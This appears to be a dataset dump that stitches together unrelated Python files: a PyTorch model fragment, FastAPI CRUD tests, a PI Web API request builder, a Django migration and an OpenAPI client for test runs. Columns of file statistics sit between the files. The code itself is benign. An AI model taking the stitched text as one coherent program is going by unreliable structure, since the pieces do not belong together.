        x1 = self.avgpool(x1)
        x1 = x1.view(-1, 25088)
        x2 = self.net3d(x2)
        # Assumes net3d output has exactly 8192 elements per sample, which
        # depends on the input clip size — TODO confirm against the loader.
        x2 = x2.view(-1, 8192)
        x = torch.cat((x1, x2), dim=1)
        x = self.classifier(x)
        return x

    def _initialize_weights(self):
        # Per-layer-type initialization; note Conv3d biases are left at
        # their default init (only the weight is re-initialized).
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                if m.bias is not None:
                    nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.Linear):
                nn.init.normal_(m.weight, 0, 0.01)
                nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.Conv3d):
                torch.nn.init.kaiming_normal_(m.weight)
            elif isinstance(m, nn.BatchNorm3d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
def make_layers(cfg, batch_norm=False):
    """Build a VGG-style 2D feature extractor from a layer spec.

    Each integer entry adds a 3x3 Conv2d (optionally followed by a
    BatchNorm2d) plus a ReLU; each 'M' entry adds a 2x2 max-pool.

    Args:
        cfg: sequence of output-channel counts and 'M' markers.
        batch_norm: insert BatchNorm2d after every convolution.

    Returns:
        nn.Sequential containing the assembled layers.
    """
    modules = []
    channels = 3  # RGB input
    for spec in cfg:
        if spec == 'M':
            modules.append(nn.MaxPool2d(kernel_size=2, stride=2))
            continue
        modules.append(nn.Conv2d(channels, spec, kernel_size=3, padding=1))
        if batch_norm:
            modules.append(nn.BatchNorm2d(spec))
        modules.append(nn.ReLU(inplace=True))
        channels = spec
    return nn.Sequential(*modules)
# if __name__ == "__main__":
# from torchviz import make_dot
#
# x1 = torch.rand(1, 3, 224, 224)
# x2 = torch.rand(1, 3, 32, 112, 112)
# net = MergeNet(num_classes=3)
# print(net)
# outputs = net.forward(x1, x2)
# g = make_dot(outputs)
# g.render('espnet_model', view=False)
# print(outputs.size())
| 38.635897
| 113
| 0.511946
| 1,047
| 7,534
| 3.575931
| 0.127985
| 0.021368
| 0.016026
| 0.051282
| 0.800214
| 0.787393
| 0.771368
| 0.759081
| 0.756944
| 0.731838
| 0
| 0.117498
| 0.321078
| 7,534
| 194
| 114
| 38.835052
| 0.614467
| 0.044598
| 0
| 0.744048
| 0
| 0
| 0.012109
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.029762
| 0
| 0.10119
| 0.011905
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
498a8a99f576918ef7440ecf85e9de8ffa0b9137
| 6,786
|
py
|
Python
|
tests/test_main.py
|
VictorDavis/timetracker
|
4bbdcaa0c8e42457b4b8e96805f98f2d7a4edf07
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
VictorDavis/timetracker
|
4bbdcaa0c8e42457b4b8e96805f98f2d7a4edf07
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
VictorDavis/timetracker
|
4bbdcaa0c8e42457b4b8e96805f98f2d7a4edf07
|
[
"MIT"
] | null | null | null |
from . import client
def test_hello_world():
    """The root endpoint responds 200 with the greeting message."""
    res = client.get("/")
    assert res.status_code == 200
    body = res.json()
    assert body["message"] == "Hello, world!"
def test_payer_crud():
    """Exercise create/read/delete on /payers, including the duplicate
    and not-found error paths.

    Note: GET/DELETE requests carry no body — the API ignores request
    bodies on those verbs, and the httpx-based TestClient rejects
    ``json=`` on ``.get()``.
    """
    # params
    payer_name = "Darwin"
    # payload
    payload = {
        "name": payer_name,
    }
    # create object
    response = client.post("/payers", json=payload)
    assert response.status_code == 200
    record = response.json()
    payer_id = record["id"]
    assert record["name"] == payer_name
    # create twice (not ok)
    response = client.post("/payers", json=payload)
    assert response.status_code == 409
    error = response.json()
    assert "Duplicate entry" in error["detail"]
    # get object
    response = client.get(f"/payers/{payer_id}")
    assert response.status_code == 200
    record = response.json()
    assert record["id"] == payer_id
    assert record["name"] == payer_name
    # delete object
    response = client.delete(f"/payers/{payer_id}")
    assert response.status_code == 200
    record = response.json()
    assert record["id"] == payer_id
    assert record["name"] == payer_name
    # delete twice (not ok)
    response = client.delete(f"/payers/{payer_id}")
    assert response.status_code == 404
    error = response.json()
    assert "Payer not found" in error["detail"]
    # get after delete (not ok)
    response = client.get(f"/payers/{payer_id}")
    assert response.status_code == 404
    error = response.json()
    assert "Payer not found" in error["detail"]
def test_client_crud():
    """Exercise create/read/delete on /clients (payer created inline),
    including the duplicate and not-found error paths.

    Note: GET/DELETE requests carry no body — the API ignores request
    bodies on those verbs, and the httpx-based TestClient rejects
    ``json=`` on ``.get()``.
    """
    # params
    payer_name = "Payer1"
    client_name = "Wallace"
    # payload
    payload = {
        "payer": {"name": payer_name},
        "name": client_name,
    }
    # create object
    response = client.post("/clients", json=payload)
    assert response.status_code == 200
    record = response.json()
    client_id = record["id"]
    assert record["name"] == client_name
    # create twice (not ok)
    response = client.post("/clients", json=payload)
    assert response.status_code == 409
    error = response.json()
    assert "Duplicate entry" in error["detail"]
    # get object
    response = client.get(f"/clients/{client_id}")
    assert response.status_code == 200
    record = response.json()
    assert record["id"] == client_id
    assert record["name"] == client_name
    # delete object
    response = client.delete(f"/clients/{client_id}")
    assert response.status_code == 200
    record = response.json()
    assert record["id"] == client_id
    assert record["name"] == client_name
    # delete twice (not ok)
    response = client.delete(f"/clients/{client_id}")
    assert response.status_code == 404
    error = response.json()
    assert "Client not found" in error["detail"]
    # get after delete (not ok)
    response = client.get(f"/clients/{client_id}")
    assert response.status_code == 404
    error = response.json()
    assert "Client not found" in error["detail"]
def test_task_crud():
    """Exercise create/read/delete on /tasks (client and payer created
    inline), including the duplicate and not-found error paths.

    Note: GET/DELETE requests carry no body — the API ignores request
    bodies on those verbs, and the httpx-based TestClient rejects
    ``json=`` on ``.get()``.
    """
    # params
    payer_name = "Payer1"
    client_name = "Client1"
    task_date = "2021-06-01"
    task_description = "I did a thing."
    task_hours = 2.5
    # payload
    payload = {
        "client": {"payer": {"name": payer_name}, "name": client_name},
        "date": task_date,
        "description": task_description,
        "hours": task_hours,
    }
    # create object
    response = client.post("/tasks", json=payload)
    assert response.status_code == 200
    record = response.json()
    task_id = record["id"]
    assert record["date"] == task_date
    assert record["description"] == task_description
    assert record["hours"] == task_hours
    # create twice (not ok)
    response = client.post("/tasks", json=payload)
    assert response.status_code == 409
    error = response.json()
    assert "Duplicate entry" in error["detail"]
    # get object
    response = client.get(f"/tasks/{task_id}")
    assert response.status_code == 200
    record = response.json()
    assert record["id"] == task_id
    assert record["date"] == task_date
    assert record["description"] == task_description
    assert record["hours"] == task_hours
    # delete object
    response = client.delete(f"/tasks/{task_id}")
    assert response.status_code == 200
    record = response.json()
    assert record["id"] == task_id
    assert record["date"] == task_date
    assert record["description"] == task_description
    assert record["hours"] == task_hours
    # delete twice (not ok)
    response = client.delete(f"/tasks/{task_id}")
    assert response.status_code == 404
    error = response.json()
    assert "Task not found" in error["detail"]
    # get after delete (not ok)
    response = client.get(f"/tasks/{task_id}")
    assert response.status_code == 404
    error = response.json()
    assert "Task not found" in error["detail"]
def test_paycheck_crud():
    """Exercise create/read/delete on /paychecks (payer created inline),
    including the duplicate and not-found error paths.

    Note: GET/DELETE requests carry no body — the API ignores request
    bodies on those verbs, and the httpx-based TestClient rejects
    ``json=`` on ``.get()``.
    """
    # params
    payer_name = "Payer1"
    paycheck_date = "2021-06-01"
    paycheck_amount = 2.5
    # payload
    payload = {
        "payer": {"name": payer_name},
        "date": paycheck_date,
        "amount": paycheck_amount,
    }
    # create object
    response = client.post("/paychecks", json=payload)
    assert response.status_code == 200
    record = response.json()
    paycheck_id = record["id"]
    assert record["date"] == paycheck_date
    assert record["amount"] == paycheck_amount
    # create twice (not ok)
    response = client.post("/paychecks", json=payload)
    assert response.status_code == 409
    error = response.json()
    assert "Duplicate entry" in error["detail"]
    # get object
    response = client.get(f"/paychecks/{paycheck_id}")
    assert response.status_code == 200
    record = response.json()
    assert record["id"] == paycheck_id
    assert record["date"] == paycheck_date
    assert record["amount"] == paycheck_amount
    # delete object
    response = client.delete(f"/paychecks/{paycheck_id}")
    assert response.status_code == 200
    record = response.json()
    assert record["id"] == paycheck_id
    assert record["date"] == paycheck_date
    assert record["amount"] == paycheck_amount
    # delete twice (not ok)
    response = client.delete(f"/paychecks/{paycheck_id}")
    assert response.status_code == 404
    error = response.json()
    assert "Paycheck not found" in error["detail"]
    # get after delete (not ok)
    response = client.get(f"/paychecks/{paycheck_id}")
    assert response.status_code == 404
    error = response.json()
    assert "Paycheck not found" in error["detail"]
| 29.376623
| 72
| 0.646331
| 831
| 6,786
| 5.150421
| 0.074609
| 0.084112
| 0.116822
| 0.140187
| 0.911682
| 0.900234
| 0.861682
| 0.815187
| 0.801168
| 0.796495
| 0
| 0.018704
| 0.220012
| 6,786
| 230
| 73
| 29.504348
| 0.789911
| 0.072944
| 0
| 0.794872
| 0
| 0
| 0.149888
| 0.01534
| 0
| 0
| 0
| 0
| 0.429487
| 1
| 0.032051
| false
| 0
| 0.00641
| 0
| 0.038462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4999deba01f1ab799fc42cae9d5a2d565d92fcd1
| 12,086
|
py
|
Python
|
piwebasync/api/controllers/assetservers.py
|
newvicx/piwebasync
|
fc0d159aa4b99667777f428a090fe7a102481fea
|
[
"MIT"
] | null | null | null |
piwebasync/api/controllers/assetservers.py
|
newvicx/piwebasync
|
fc0d159aa4b99667777f428a090fe7a102481fea
|
[
"MIT"
] | 2
|
2022-03-02T17:42:21.000Z
|
2022-03-29T19:24:01.000Z
|
piwebasync/api/controllers/assetservers.py
|
newvicx/piwebasync
|
fc0d159aa4b99667777f428a090fe7a102481fea
|
[
"MIT"
] | null | null | null |
from typing import List, Tuple, Union
from ...types import APIRequestType, ControllerType, QueryStrType
class AssetServers:
    """
    Request builders for the PI Web API ``assetservers`` controller.

    Every public method only *constructs* a request object through the
    owning controller's ``_build_request``; nothing is sent here.

    https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver.html
    """

    # URL path segment of this controller.
    CONTROLLER = "assetservers"

    def __init__(self, constructor: ControllerType) -> None:
        self._constructor = constructor

    def _request(self, action, **params) -> APIRequestType:
        """Build an HTTP GET request against this controller.

        Every endpoint of the asset-server controller is a GET, so the
        method/protocol/controller boilerplate lives here once.  ``params``
        are forwarded to ``_build_request`` in the order given.
        """
        return self._constructor._build_request(
            method="GET",
            protocol="HTTP",
            controller=self.CONTROLLER,
            action=action,
            **params,
        )

    def list(
        self,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/list.html
        """
        return self._request(
            None,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )

    def get(
        self,
        webid: str,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/get.html
        """
        return self._request(
            None,
            webid=webid,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )

    def get_by_path(
        self,
        path: str,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getbypath.html
        """
        return self._request(
            None,
            path=path,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )

    def get_analysis_rule_plugins(
        self,
        webid: str,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getanalysisruleplugins.html
        """
        return self._request(
            "analysisruleplugins",
            webid=webid,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )

    def get_by_name(
        self,
        name: str,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getbyname.html
        """
        return self._request(
            None,
            name=name,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )

    def get_databases(
        self,
        webid: str,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getdatabases.html
        """
        return self._request(
            "assetdatabases",
            webid=webid,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )

    def get_notification_contact_templates(
        self,
        webid: str,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getnotificationcontacttemplates.html
        """
        return self._request(
            "notificationcontacttemplates",
            webid=webid,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )

    def get_notification_plugins(
        self,
        webid: str,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getnotificationplugins.html
        """
        return self._request(
            "notificationplugins",
            webid=webid,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )

    def get_security(
        self,
        webid: str,
        security_item: Union[List[str], Tuple[str]] = None,
        user_identity: Union[List[str], Tuple[str]] = None,
        force_refresh: bool = None,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getsecurity.html
        """
        # security_item/user_identity accept multiple values here, hence
        # the *_many parameter names expected by _build_request.
        return self._request(
            "security",
            webid=webid,
            security_item_many=security_item,
            user_identity_many=user_identity,
            force_refresh=force_refresh,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )

    def get_security_entries(
        self,
        webid: str,
        security_item: str = None,
        name_filter: QueryStrType = None,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getsecurityentries.html
        """
        return self._request(
            "securityentries",
            webid=webid,
            security_item=security_item,
            name_filter=name_filter,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )

    def get_security_entry_by_name(
        self,
        webid: str,
        name: str,
        security_item: str = None,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getsecurityentrybyname.html
        """
        return self._request(
            "securityentries",
            webid=webid,
            security_item=security_item,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
            # The entry name is an extra URL path segment, not a query param.
            add_path=[name],
        )

    def get_security_identities(
        self,
        webid: str,
        query: QueryStrType = None,
        field: str = None,
        sort_field: str = None,
        sort_order: str = None,
        max_count: int = None,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getsecurityidentities.html
        """
        return self._request(
            "securityidentities",
            webid=webid,
            query=query,
            field=field,
            sort_field=sort_field,
            sort_order=sort_order,
            max_count=max_count,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )

    def get_security_identities_for_user(
        self,
        webid: str,
        user_identity: str = None,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getsecurityidentitiesforuser.html
        """
        return self._request(
            "securityidentities",
            webid=webid,
            user_identity=user_identity,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )

    def get_security_mappings(
        self,
        webid: str,
        query: QueryStrType = None,
        field: str = None,
        sort_field: str = None,
        sort_order: str = None,
        max_count: int = None,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getsecuritymappings.html
        """
        return self._request(
            "securitymappings",
            webid=webid,
            query=query,
            field=field,
            sort_field=sort_field,
            sort_order=sort_order,
            max_count=max_count,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )

    def get_time_rule_plugins(
        self,
        webid: str,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/gettimeruleplugins.html
        """
        return self._request(
            "timeruleplugins",
            webid=webid,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )

    def get_unit_classes(
        self,
        webid: str,
        selected_fields: Union[List[str], Tuple[str]] = None,
        web_id_type: str = None,
    ) -> APIRequestType:
        """
        https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getunitclasses.html
        """
        return self._request(
            "unitclasses",
            webid=webid,
            selected_fields=selected_fields,
            web_id_type=web_id_type,
        )
| 29.841975
| 139
| 0.579927
| 1,215
| 12,086
| 5.544856
| 0.08642
| 0.099748
| 0.064124
| 0.045421
| 0.844738
| 0.834348
| 0.827223
| 0.827223
| 0.827223
| 0.827223
| 0
| 0
| 0.317309
| 12,086
| 404
| 140
| 29.915842
| 0.816507
| 0.162999
| 0
| 0.797297
| 0
| 0
| 0.032881
| 0.002877
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057432
| false
| 0
| 0.006757
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49a2381a0358b7846a4f2f91b517df7aab7202f0
| 1,948
|
py
|
Python
|
system/migrations/0003_auto_20180608_0923.py
|
17621368758/tranpathPY
|
01cf371c260275811e3750de116fa5b95718bafe
|
[
"MIT"
] | 1
|
2020-06-05T16:01:21.000Z
|
2020-06-05T16:01:21.000Z
|
system/migrations/0003_auto_20180608_0923.py
|
17621368758/tranpathPY
|
01cf371c260275811e3750de116fa5b95718bafe
|
[
"MIT"
] | 4
|
2020-02-11T23:27:37.000Z
|
2021-12-13T19:52:11.000Z
|
system/migrations/0003_auto_20180608_0923.py
|
17621368758/tranpathPY
|
01cf371c260275811e3750de116fa5b95718bafe
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.5 on 2018-06-08 09:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration: alters ForeignKey fields on the
    # excel-import tables to be nullable with on_delete=SET_NULL, and sets
    # form metadata via help_text.  Field definitions (including the
    # non-English verbose_name strings) are kept exactly as generated.

    dependencies = [
        ('system', '0002_auto_20180601_2250'),
    ]

    operations = [
        migrations.AlterField(
            model_name='excel_import_file_fields_name',
            name='adder',
            field=models.ForeignKey(help_text='{"form":"F"}', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='excel_import_file_fields_name_adder', to='system.User', verbose_name='添加人(User.id)'),
        ),
        migrations.AlterField(
            model_name='excel_import_file_fields_name',
            name='excelImportFileMainId',
            field=models.ForeignKey(help_text='{"form":"F"}', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='excel_import_file_main_id', to='system.Excel_import_file_main', verbose_name='导入文件主表ID'),
        ),
        migrations.AlterField(
            model_name='excel_import_file_main',
            name='adder',
            field=models.ForeignKey(help_text='{"form":"F"}', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='excel_import_file_main_adder', to='system.User', verbose_name='添加人(User.id)'),
        ),
        migrations.AlterField(
            model_name='excel_import_file_main',
            name='importer',
            field=models.ForeignKey(help_text='{"form":"F"}', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='importer', to='system.User', verbose_name='设置字段名时间操作人(User.id)'),
        ),
        migrations.AlterField(
            model_name='excel_import_file_main',
            name='setFieldNamer',
            field=models.ForeignKey(help_text='{"form":"F"}', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='setFieldNamer', to='system.User', verbose_name='设置字段名时间操作人(User.id)'),
        ),
    ]
| 48.7
| 222
| 0.667864
| 240
| 1,948
| 5.145833
| 0.233333
| 0.080162
| 0.109312
| 0.123077
| 0.766802
| 0.766802
| 0.758704
| 0.758704
| 0.700405
| 0.661538
| 0
| 0.019595
| 0.187885
| 1,948
| 39
| 223
| 49.948718
| 0.761062
| 0.023101
| 0
| 0.515152
| 1
| 0
| 0.271962
| 0.149921
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.393939
| 0
| 0.484848
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b8f559ee80a214300a016d11ff8ed8c7049745f1
| 22,650
|
py
|
Python
|
ibutsu_client/api/run_api.py
|
ibutsu/ibutsu-client-python
|
8cd34d7fc8f9a2225195ae375a17200b992dde01
|
[
"MIT"
] | 3
|
2020-07-02T14:48:08.000Z
|
2021-11-27T14:06:33.000Z
|
ibutsu_client/api/run_api.py
|
ibutsu/ibutsu-client-python
|
8cd34d7fc8f9a2225195ae375a17200b992dde01
|
[
"MIT"
] | 6
|
2020-07-07T16:13:37.000Z
|
2021-11-10T17:02:59.000Z
|
ibutsu_client/api/run_api.py
|
ibutsu/ibutsu-client-python
|
8cd34d7fc8f9a2225195ae375a17200b992dde01
|
[
"MIT"
] | 5
|
2020-07-02T18:13:03.000Z
|
2021-11-03T09:21:11.000Z
|
"""
Ibutsu API
A system to store and query test results # noqa: E501
The version of the OpenAPI document: 1.13.4
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from ibutsu_client.api_client import ApiClient, Endpoint as _Endpoint
from ibutsu_client.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from ibutsu_client.model.run import Run
from ibutsu_client.model.run_list import RunList
from ibutsu_client.model.update_run import UpdateRun
class RunApi(object):
    """API operations on test runs: add, get, list, update, bulk-update.

    NOTE: This class is auto generated by OpenAPI Generator
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    def __init__(self, api_client=None):
        # Fall back to a default ApiClient when none is injected.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

        # POST /run -- create a single run (JWT auth, JSON in/out).
        self.add_run_endpoint = _Endpoint(
            settings={
                'response_type': (Run,),
                'auth': [
                    'jwt'
                ],
                'endpoint_path': '/run',
                'operation_id': 'add_run',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': [
                    'run',
                ],
                'required': [],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'run':
                        (Run,),
                },
                'attribute_map': {
                },
                'location_map': {
                    'run': 'body',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json'
                ]
            },
            api_client=api_client
        )
        # POST /runs/bulk-update -- apply common metadata to many runs at once.
        self.bulk_update_endpoint = _Endpoint(
            settings={
                'response_type': (RunList,),
                'auth': [
                    'jwt'
                ],
                'endpoint_path': '/runs/bulk-update',
                'operation_id': 'bulk_update',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': [
                    'update_run',
                    'filter',
                    'page_size',
                ],
                'required': [
                    'update_run',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'update_run':
                        (UpdateRun,),
                    'filter':
                        ([str],),
                    'page_size':
                        (int,),
                },
                'attribute_map': {
                    'filter': 'filter',
                    'page_size': 'pageSize',
                },
                'location_map': {
                    'update_run': 'body',
                    'filter': 'query',
                    'page_size': 'query',
                },
                'collection_format_map': {
                    # repeated ?filter=... query parameters
                    'filter': 'multi',
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json'
                ]
            },
            api_client=api_client
        )
        # GET /run/{id} -- fetch one run by its UUID.
        self.get_run_endpoint = _Endpoint(
            settings={
                'response_type': (Run,),
                'auth': [
                    'jwt'
                ],
                'endpoint_path': '/run/{id}',
                'operation_id': 'get_run',
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': [
                    'id',
                ],
                'required': [
                    'id',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'id':
                        (str,),
                },
                'attribute_map': {
                    'id': 'id',
                },
                'location_map': {
                    'id': 'path',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                # GET requests carry no body, hence no content type.
                'content_type': [],
            },
            api_client=api_client
        )
        # GET /run -- list runs with optional filtering and paging.
        self.get_run_list_endpoint = _Endpoint(
            settings={
                'response_type': (RunList,),
                'auth': [
                    'jwt'
                ],
                'endpoint_path': '/run',
                'operation_id': 'get_run_list',
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': [
                    'filter',
                    'estimate',
                    'page',
                    'page_size',
                ],
                'required': [],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'filter':
                        ([str],),
                    'estimate':
                        (bool,),
                    'page':
                        (int,),
                    'page_size':
                        (int,),
                },
                'attribute_map': {
                    'filter': 'filter',
                    'estimate': 'estimate',
                    'page': 'page',
                    'page_size': 'pageSize',
                },
                'location_map': {
                    'filter': 'query',
                    'estimate': 'query',
                    'page': 'query',
                    'page_size': 'query',
                },
                'collection_format_map': {
                    # repeated ?filter=... query parameters
                    'filter': 'multi',
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [],
            },
            api_client=api_client
        )
        # PUT /run/{id} -- update an existing run.
        self.update_run_endpoint = _Endpoint(
            settings={
                'response_type': (Run,),
                'auth': [
                    'jwt'
                ],
                'endpoint_path': '/run/{id}',
                'operation_id': 'update_run',
                'http_method': 'PUT',
                'servers': None,
            },
            params_map={
                'all': [
                    'id',
                    'run',
                ],
                'required': [
                    'id',
                    'run',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'id':
                        (str,),
                    'run':
                        (Run,),
                },
                'attribute_map': {
                    'id': 'id',
                },
                'location_map': {
                    'id': 'path',
                    'run': 'body',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json'
                ]
            },
            api_client=api_client
        )

    def add_run(
        self,
        **kwargs
    ):
        """Create a run  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.add_run(async_req=True)
        >>> result = thread.get()

        Keyword Args:
            run (Run): Run item. [optional]
            _return_http_data_only (bool): response data without head status
                code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number provided, it will be total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
            async_req (bool): execute request asynchronously

        Returns:
            Run
                If the method is called asynchronously, returns the request
                thread.
        """
        # Fill in client-behaviour defaults when the caller omits them.
        kwargs['async_req'] = kwargs.get(
            'async_req', False
        )
        kwargs['_return_http_data_only'] = kwargs.get(
            '_return_http_data_only', True
        )
        kwargs['_preload_content'] = kwargs.get(
            '_preload_content', True
        )
        kwargs['_request_timeout'] = kwargs.get(
            '_request_timeout', None
        )
        kwargs['_check_input_type'] = kwargs.get(
            '_check_input_type', True
        )
        kwargs['_check_return_type'] = kwargs.get(
            '_check_return_type', True
        )
        kwargs['_host_index'] = kwargs.get('_host_index')
        return self.add_run_endpoint.call_with_http_info(**kwargs)

    def bulk_update(
        self,
        update_run,
        **kwargs
    ):
